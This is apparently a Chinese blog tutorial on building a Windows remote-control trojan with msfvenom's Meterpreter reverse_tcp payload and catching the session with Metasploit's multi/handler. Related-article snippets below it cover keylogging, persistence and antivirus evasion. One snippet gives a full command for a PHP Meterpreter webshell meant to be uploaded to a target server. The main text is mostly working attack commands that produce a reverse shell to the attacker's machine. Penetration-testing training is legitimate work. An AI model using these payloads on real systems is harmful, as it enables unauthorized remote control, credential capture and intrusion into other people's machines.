使用Meterpreter生成被控端并进行远程控制

最新推荐文章于 2025-06-23 18:30:00 发布

十门

最新推荐文章于 2025-06-23 18:30:00 发布

阅读量368

点赞数 8

CC 4.0 BY-SA版权

文章标签：安全

本文链接：https://blog.youkuaiyun.com/moshiyum/article/details/143234549

首先需了解Meterpreter

1.什么是Meterpreter

Meterpreter是一个用于渗透测试和漏洞利用的强大工具，它是Metasploit框架的一部分。Meterpreter是一种高级的Payload，它提供了一个强大的交互式命令行界面，允许攻击者在目标系统上执行各种命令和控制操作。

2.生成木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本机的ip lport=10000 -f exe -o payload.exe

reverse_tcp解释一下：reverse_tcp 这是一个基于TCP的反弹shell

同时还有 everse_http reverse_http

正向连接：在msf中通常是指，bind_tcp，定义--攻击机主动发起连接请求，连接到目标靶机特定的一个端口，目标机器也需要开启一个监听端口，比如tcp监听

反向连接：在msf中通常是指，reverse_tcp，定义--更常用，通过设置reverse_tcp攻击载荷可以轻松实现反弹，监听只需要在本机开启监听端口。

主要区别就是公网和局域网的不同利用，正向连接通常攻击机用在局域网中不能访问外网靶机，反向连接需要两个机器都需要能互相ping

端口为任意没有被占用的端口

3.监听

1.进入

msfconsole

进入msf

2.设置参数

use exploit/multi/handler //进入handler模块

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.88.129//设置本机ip

set lport 4000

run

3.从本地打开生成的木马

成功了

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

十门

关注关注

8
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Meterpreter使用详解

悦分享

11-23

375

Meterpreter是一种先进的，可动态扩展的有效负载，它使用内存中的 DLL注入阶段，并在运行时通过网络扩展。它通过stager套接字进行通信并提供全面的客户端Ruby API。它包含命令历史记录，制表符完成，频道等。Metepreter最初由Metasploit 2.x的skape编写，常见的扩展名合并为3.x，目前正在对Metasploit 3.3进行大修。服务器部分以纯C实现，现在使用MSVC进行编译，使其具有一定的便携性。

渗透测试常用工具-使用meterpreter模块进行后渗透测试

旺仔Sec&blog

10-24

1614

再然后使用命令keyscan_start对键盘进行监听，使用命令keyscan_dump保存截获的键盘信息（注：windows会话窗口的概念，windows桌面划分为不同的会话(session)，以便于与windows交互。第五步，使用info windows/meterpreter/reverse_tcp命令来查看攻击载荷模块的具体信息，该模块适用于Windows x86平台不需要admin权限便可以运行，大小为281字节，需要配置三个参数分别为退出的方式、监听的地址、监听的端口号、EXITFUNC。

参与评论您还未登录，请先登录后发表或查看评论

python/meterpreter/rev_tcp 的监听

cong86的博客

08-07

1270

python/meterpreter/rev_tcp 的监听 ip地址的设置： 1）、使用桥接模式，打开VM 的“虚拟机”点击设置查看网络设置是不是桥接模式，如图所示 2）手动设置静态ip地址，这里要与主机ip地址在同一网段，不然到后面监听不到，因为我的windows的ip地址如图所示： 3）、然后看一下能不能ping通，ping通后开始实验（如果

渗透测试window7，加强木马防范意识

yuanyuan2223的博客

04-06

5757

渗透测试window7，加强木马防范意识通过钓鱼网站给win7系统植入后门并控制的流程一、知识点总结： 1 生成后门程序 2 通过钓鱼方式植入木马靶机（社工） 3 使用Metasploit配置监控并控制靶机 4 控制靶机我们能做什么二、用到的系统和工具： 1 Kali(系统)； 2 Windows7（靶机系统）； 3 Metasploit（渗透工具）； 4 msfvenom（Metasploit自带的后门生成模块）； 5 Meterpreter（后渗透常用通道）；三、使用msfvenom开始生成木马

Meterpreter 简单入门

热门推荐

eli的博客

05-18

1万+

0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获.

【内网安全】——meterpreter使用攻略

qq_53058639的博客

01-26

2002

Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力，本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。

渗透测试 ( 4 ) --- Meterpreter 命令详解

freeking101的博客

07-02

1万+

Meterpreter 是 Metasploit 框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.

使用msfvenom生成被控端并进行远程控制

Z_3679的博客

07-01

587

使用-p使用LHOST和LPORT选项指定攻击者的IP地址和端口使用-fexeapkphpraw使用-o选项指定输出文件的路径和名称使用RHOST和RPORT选项指定目标的IP地址和端口其他选项根据不同payload类型而有所不同使用-e使用--list选项列出可用的payload、编码器、nop等模块使用--help选项获取帮助信息使用-n选项关闭payload的后门。

如何使用msfvenom生成被控端并进行远程控制

Hotumn的博客

06-26

682

Kali Linux2中提供了一个名为MSFPC(MSFvenom Payload Creator)的工具，它其实是MSFvenom的优化版，使用起来更简单，利用这个工具就可以轻松地生成各种系统的远程控制被控端。在KaliLinux2中提供了多个可以用来生成远程控制被控端的命令，其中较为简单且强大的命令为msfvenom命令，MSFPC命令其实也是经过包装的msfvenom命令。msfvenom命令是渗透测试工具Metasploit中的一个命令，但是我们可以直接在。

远程控制被控端与杀毒软件的博弈

a1013770350的博客

05-03

1940

1、启动PowerSploit的方法：开始/搜索程序和文件（输入：PowerShell，选择Windows PowerShell）注意：程序被注入后，可能会出现工作异常的情况，所以不要注入到系统进程里，否则会引起程序崩溃。记事本是否已经崩溃？注：每深入一次分解，分解小文件的大小要逐级降低，如改为：-interval 1000、-interval 100。7、这次生成的是64位的攻击载荷，对64位的进程有效，那么对32位的进程有否有效？（3）对报毒的文件重复上述分解、查毒过程，直到找到特征码所在的位置。

meterpreter常用命令上

Kalds157551973的博客

11-24

812

将 Meterpreter 会话迁移到另一个进程，以躲避检测。启用隐蔽模式，减少被防病毒软件或入侵检测系统发现的风险。列出当前所有活动的 Meterpreter 会话。启动系统的命令行 shell，可以执行系统命令。显示目标系统的基本信息（操作系统、架构等）。显示目标的路由表，或在目标上添加/删除路由。切换到指定的 Meterpreter 会话。退出 Meterpreter 会话。将文件从本地机器上传到目标系统。显示目标系统的 IP 配置信息。从目标系统下载文件到本地机器。显示当前系统上运行的进程列表。

Windows 权限维持之 Meterpreter 深度解析

m0_57836225的博客

03-03

1128

Meterpreter 是 Metasploit Framework（MSF）的一个扩展功能，它为渗透测试人员提供了一个功能强大的交互式 Shell 环境。与普通 Shell 相比，Meterpreter 集成了众多实用功能，能更高效地执行各种操作。在权限维持场景下，Meterpreter 可帮助攻击者在获取初始权限后，通过多种技术手段确保对目标系统的长期控制，避免因漏洞修复或管理员发现而导致权限丢失。Meterpreter 在 Windows 权限维持方面提供了强大的功能和多样的技术手段。

Meterpreter命令合集（详细）

2302_76986722的博客

09-16

3136

help# 查看Meterpreter帮助background#返回，把meterpreter后台挂起bgkill# 杀死一个 meterpreter 脚本bglist#提供所有正在运行的后台脚本的列表bgrun#作为一个后台线程运行脚本channel#显示活动频道sessions -i number # 与会话进行交互，number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用sesssions -k number #与会话进行交互。

python实现远程运行bat文件

Oona_01的博客

07-08

133

这篇文章主要介绍了python实现远程运行bat文件方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教。在这个例子中，我们使用了psexec工具，它是Sysinternals套件中的一部分，可以在微软官网下载。另外，出于安全考虑，直接在代码中包含用户名和密码不是最安全的做法，你可能需要更安全的方式来管理凭据。如果你想要在Python中远程运行批处理（.bat）文件，你可以使用subprocess模块。你需要确保psexec在你的系统PATH中，或者提供完整的路径。

Metapreter实现持续访问，自动化，提权--详细教程

qq_41245301的博客

01-05

841

1.先拿到目标主机的控制权限后，将目标主机的会话转入后台，切换到 exploit/windows/local/persistence 模块，注意这个模块选择的payload，因为在后面进行监听的时候需要和这个payload相同。EXE_NAME 生成后门文件的文件名称（非必要，用默认）REG_NAME 注册表设置的名称（非必要，用默认）VBS_NAME VBS脚本的名称（非必要，用默认）PATH 后门文件的存放路径（非必要，用默认）SESSION 作用于那个会话。这里会自动执行文件中的命令。

Metasploit渗透技巧---渗透Meterpreter笔记

hackzkaq的博客

12-11

604

Metasploit是一个免费的、可下载的渗透测试框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击测试。它本身附带数百个已知软件漏洞的专业级漏洞攻击测试工具。当H.D. Moore在2003年发布Metasploit时，计算机安全状况也被永久性地改变了。仿佛一夜之间，任何人都可以成为黑客，每个人都可以使用攻击工具来测试那些未打过补丁或者刚刚打过补丁的漏洞。

使用msfvenom生成php木马，反弹meterpreter

11-14

MSFVenom是一个由Metasploit Framework提供的工具，用于创建各种类型的payloads，包括PHP木马（也称为Webshell）。当你想利用PHP漏洞并获取Meterpreter（Meterpreter是一种高级、交互式的远程管理工具）控制时，可以按照以下步骤操作： 1. **安装与配置**: 首先，你需要安装Metasploit框架及其工具包。如果你尚未安装，可以从其官方网站https://metasploit.com/下载对应平台的版本。 2. **启动MSFVenom**: 打开终端或命令提示符，导航到Metasploit的bin目录，并运行`./msfvenom`。 3. **选择payload**: 输入`show payloads`查看可用的payload选项，找到适用于PHP的Meterpreter payload，如`php/meterpreter/reverse_tcp`。 4. **设置目标和监听端口**: 指定你想要入侵的目标IP地址和Meterpreter服务将监听的本地端口。例如，你可以输入`payload = php/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=8080`。 5. **生成webshell**: 添加`-f`参数指定输出文件格式，这里是PHP，然后指定文件名，例如`-f shell.php`。命令如下： ``` msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=8080 -f php -o shell.php ``` 6. **保存与部署**: 这会生成一个名为`shell.php`的PHP脚本，将其上传到目标服务器的网站目录，使其可以通过HTTP访问。 7. **测试连接**: 目标主机访问这个生成的webshell页面，如果一切正常，Meterpreter连接会在受害者计算机上建立。